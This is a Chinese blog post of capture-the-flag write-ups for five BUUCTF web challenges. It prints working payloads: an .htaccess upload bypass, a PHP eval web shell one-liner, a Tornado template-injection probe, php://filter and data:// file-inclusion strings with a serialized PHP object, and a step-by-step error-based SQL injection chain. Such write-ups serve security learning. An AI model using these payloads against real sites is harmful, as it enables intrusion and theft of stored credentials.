BUUCTF-WEB(21-25)

news/2024/11/15 11:48:30/文章来源:https://www.cnblogs.com/Muneyoshi/p/18202895

[HCTF 2018]admin

这道题目就是admin说明得管理员登录

那我直接创一个admin的账号但是显示已经存在了

image-20240520153421132

说明用户名就是admin,然后我们直接爆破,也是爆破出来密码就是123

image-20240520153348549

直接登录

image-20240520153458355

[MRCTF2020]你传你🐎呢

这个题就是文件上传,我们MIME绕过,后缀名都被ban了,我们上传.htaccess绕过

<IfModule mime_module>
SetHandler application/x-httpd-php   
</IfModule>

image-20240520154404200

然后上传一句话木马

<?php @eval($_POST['cmd']);?>

image-20240520154550371

然后蚁剑连接,根目录找到flag

image-20240520154624010

护网杯 2018]easy_tornado

参考:

[护网杯 2018]easy_tornado 1(两种解法!)_easytornado-CSDN博客

SSTI入门详解-CSDN博客

打开题目,知道我们的hashfile是由cookie还有filename决定的

image-20240520160613418

image-20240520160456927

文件名我们是已经有了

image-20240520160629937

看了大佬的题解,他就是SSTI

error?msg={{handler.settings}}

image-20240520160737955

handler.settings就是

在tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。

然后我们去加密文件名,然后和cookie拼接起来,在加密一次

cookie值

cc4783e1-81c0-44bc-9833-2272b1f64a7f

filename MD5加密后

3bf9f6cf685a6dd8defadabfb41a03a1

拼接后

cc4783e1-81c0-44bc-9833-2272b1f64a7f3bf9f6cf685a6dd8defadabfb41a03a1

再次加密

2c122b43eabf95f1ea4472881f56c7a2

访问

?filename=/fllllllllllllag&filehash=2c122b43eabf95f1ea4472881f56c7a2

image-20240520161101922

[ZJCTF 2019]NiZhuanSiWei

这道题是文件包含题+反序列化

image-20240520162837134

第一层就是要文本里面的内容是welcome to the zjctf

那我们就用data://text/plain

?text=data://text/plain,welcome to the zjctf

image-20240520162943942

第二关,他提示我们需要useless.php

我们查看useless.php的源码,用php://filter

?text=data://text/plain,welcome%20to%20the%20zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php

解码出来是这样

image-20240520163129073

第三关我们需要反序列化

image-20240520164126959

最后总的就是这个

?text=data://text/plain,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

查看源码,找到flag

image-20240520164155351

[极客大挑战 2019]HardSQL

参考:

[极客大挑战 2019]HardSQL 1-CSDN博客

[极客大挑战 2019]HardSQL-CSDN博客

这道题看大佬们的WP,我做这个sql题每次都被拷打

爆库:

admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

image-20240520214859541

爆表:

admin'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))#

image-20240520214941873

爆列:

admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

image-20240520215014969

爆数据:

admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,'~',username,'~',password))from(H4rDsq1)),0x7e),1))#

image-20240520215129675

flag{9393e26b-77ea-42e0-

这里其实只能拿到一半flag,我之前也遇到这个问题,这次也是终于解决了

新知识:查不全时可用left(),right()

substring与mid被过滤可以用right与left来绕过

这里就用right

admin'or(updatexml(1,concat(0x7e,(select(right(password,25))from(H4rDsq1)),0x7e),1))#

image-20240520215614292

完整的flag

flag{9393e26b-77ea-42e0-ace4-63d3a27718be}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/709471.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

5.8-随堂练习1

5.8-随堂练习1

1992年,姜万勐 看到 MPEG芯片 Epiphany – 用MPEG1 把图像和声音同时存储在一张小光盘上 VCD(Video Compact Disc)。 1993年9月 万燕第一批1000台VCD机下线。 几乎都被国内外家电公司买去解剖做样机 万燕VCD 100% 市场份额 1995年 各路仿制的VCD机大举进军市场,竞争激烈。 …
阅读更多...
5.8-随堂练习-小组练习2

5.8-随堂练习-小组练习2

结合本小组项目写下能想到的所有 SWOT答案: 【第九组】 在充电桩电控系统项目中,可以想到以下所有的SMOT(Strengths, Weaknesses, Opportunities, Threats): Strengths (强项):功能丰富:系统具有多种功能,包括充电桩管理、用户充电、支付功能等。 易用性:界面设计简洁…
阅读更多...
foobar2000 v2.1.5 汉化版

foobar2000 v2.1.5 汉化版

foobar2000 v2.1.5 汉化版 -----------------------【软件截图】---------------------- -----------------------【软件介绍】---------------------- foobar2000 是一个 Windows 平台下的高级音频播放器.包含完全支持 unicode 及支持播放增益的高级标签功能. 特色: * 支持的…
阅读更多...
学习笔记

学习笔记

CPP:函数指针定义方法 int (func)(int i); int (p)(int)=func
阅读更多...
C123【模板】扩展域并查集 P1892 [BOI2003] 团伙

C123【模板】扩展域并查集 P1892 [BOI2003] 团伙

视频链接: P1892 [BOI2003] 团伙 - 洛谷 | 计算机科学教育新生态 (luogu.com.cn)// 扩展域并查集 #include <iostream> #include <cstring> #include <algorithm> using namespace std;int n,m,a,b,s; int p[2005];int find(int x){return p[x]==x?x:p[…
阅读更多...
Hadoop集群模式的搭建之四:运行Hadoop集群

Hadoop集群模式的搭建之四:运行Hadoop集群

格式化NameNode 当第一次启动HDFS时要进行格式化,将NameNode上的数据清零,否则会缺失DataNode。以后启动无需再格式化,只要运行过Hadoop集群,其工作目录(/usr/local/src/hadoop/tmp)中就会有数据。如果需要重新格式化,则在重新格式化之前一定要先删除工作目录下的数据,…
阅读更多...
3.13-主题讨论

3.13-主题讨论

答案: 作为创始人,将产品的远景转化为需求,并确保在用户行为改变的情况下保持产品的愿景,需要以下步骤:分析和定义需求:首先,对产品的远景进行详细分析,确定在10年后产品要实现的目标和愿景。然后,将这些目标和愿景转化为具体的功能和特性需求,以确保产品能够满足用户…
阅读更多...
SpringBoot 连接 redis 相关问题

SpringBoot 连接 redis 相关问题

密码配置客户端连接
阅读更多...
zookeeper控制台

zookeeper控制台

最近在使用ElasticJob的时候遇到了 elasticjob conflict jobs 的问题,就想着能不能把这个job从zk中剔除。 ElasticJob的注册中心是zk,就想通过控制台把那个定时任务给移除掉。 zk控制台下载(https://github.com/DeemOpen/zkui.git),用idea打开修改下config.cfg文件中zk服务的…
阅读更多...
“现代汽车中国前瞻软件赛杯” 牛客周赛 Round 43 D、E

“现代汽车中国前瞻软件赛杯” 牛客周赛 Round 43 D、E

那时候吃了饭后,剩下25分钟,我就把A-D都过了一遍,E不够时间。D 对于x~y这个长度为k的序列:对于1~k每个数,它出现的数目。 从x~y,到x+1~y:如果一个数出现的数目从0 -> 1,出现元素数目+1;如果一个数出现的数目从1 -> 0,出现元素数目-1。 记录所有出现元素数目=k的…
阅读更多...
常回家看看之off_by_one

常回家看看之off_by_one

❗off_by_one这个漏洞比较特殊,它不像上一期的堆溢出,可以溢出很多字节,它只能溢出一个字节,在栈里面也可以通过这个漏洞修改返回地址什么的,在堆里面我们主要利用它来修改堆块的大小,形成fake_chunk也就可以进行堆的重叠,在64位的时候如果申请0x18,0x28,0x38这样的堆…
阅读更多...
LLM实战:当网页爬虫集成gpt3.5

LLM实战:当网页爬虫集成gpt3.5

本文主要是通过Scrapegraph-ai集成gpt3.5实现一个简单的网页爬取并解析的demo应用,其中涉及到gpt3.5免费申请,Scrapegraph-ai底层原理简介,demo应用源码等。1. 背景 最近本qiang~关注了一个开源项目Scrapegraph-ai,是关于网页爬虫结合LLM的项目,所以想一探究竟,毕竟当下及…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023